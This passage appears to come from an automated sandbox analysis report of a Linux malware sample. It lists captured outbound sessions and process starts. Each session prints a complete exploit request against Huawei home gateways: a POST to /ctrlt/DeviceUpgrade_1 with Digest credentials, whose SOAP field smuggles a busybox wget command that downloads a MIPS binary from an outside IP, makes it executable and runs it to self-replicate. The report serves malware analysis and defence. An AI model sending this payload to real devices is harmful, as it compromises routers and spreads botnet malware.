                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                145192.168.2.1453444131.78.104.937215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830837965 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                146192.168.2.1436374197.48.219.13137215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830837965 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                147192.168.2.1459972155.221.192.13637215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830837965 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                148192.168.2.145144241.21.217.17137215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.831806898 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                149192.168.2.1433816157.55.227.6237215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.831806898 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                System Behavior

                                                Start time (UTC):21:05:31
                                                Start date (UTC):20/07/2024
                                                Path:/tmp/1gx339YsKN.elf
                                                Arguments:/tmp/1gx339YsKN.elf
                                                File size:169000 bytes
                                                MD5 hash:2beb689c25baa0cc6a3a602be940271d

                                                Start time (UTC):21:05:31
                                                Start date (UTC):20/07/2024
                                                Path:/tmp/1gx339YsKN.elf
                                                Arguments:-
                                                File size:169000 bytes
                                                MD5 hash:2beb689c25baa0cc6a3a602be940271d

                                                Start time (UTC):21:05:31
                                                Start date (UTC):20/07/2024
                                                Path:/tmp/1gx339YsKN.elf
                                                Arguments:-
                                                File size:169000 bytes
                                                MD5 hash:2beb689c25baa0cc6a3a602be940271d

                                                Start time (UTC):21:05:31
                                                Start date (UTC):20/07/2024
                                                Path:/tmp/1gx339YsKN.elf
                                                Arguments:-
                                                File size:169000 bytes
                                                MD5 hash:2beb689c25baa0cc6a3a602be940271d

                                                Start time (UTC):21:05:31
                                                Start date (UTC):20/07/2024
                                                Path:/tmp/1gx339YsKN.elf
                                                Arguments:-
                                                File size:169000 bytes
                                                MD5 hash:2beb689c25baa0cc6a3a602be940271d

                                                Start time (UTC):21:05:31
                                                Start date (UTC):20/07/2024
                                                Path:/tmp/1gx339YsKN.elf
                                                Arguments:-
                                                File size:169000 bytes
                                                MD5 hash:2beb689c25baa0cc6a3a602be940271d

                                                Start time (UTC):21:05:31
                                                Start date (UTC):20/07/2024
                                                Path:/tmp/1gx339YsKN.elf
                                                Arguments:-
                                                File size:169000 bytes
                                                MD5 hash:2beb689c25baa0cc6a3a602be940271d